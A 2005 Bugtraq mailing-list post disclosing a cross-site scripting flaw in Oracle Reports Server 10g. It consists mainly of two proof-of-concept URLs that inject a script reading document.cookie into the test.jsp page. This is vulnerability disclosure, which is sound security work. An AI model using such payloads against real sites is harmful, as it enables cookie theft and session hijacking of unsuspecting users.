
Date: 24 Mar 2005 14:23:10 -0000
From: Paolo Paolo <paolo.paolo@...l.ee>
To: bugtraq@...urityfocus.com
Subject: Oracle Reports Server 10g Vulnerable to  XSS




Oracle Reports Server 10g (9.0.4.3.3) Vulnerable to Cross Site Scripting


#####################

http://paolo/reports/examples/Tools/test.jsp?repprod&desname='&lt;script&gt;alert(document.cookie);&lt;/script&gt;

http://paolo/reports/examples/Tools/test.jsp?repprod"&lt;script&gt;alert(document.cookie);&lt;/script&gt;

#####################
 
Paolo sends GREETS to Oracle secalert



Paolo


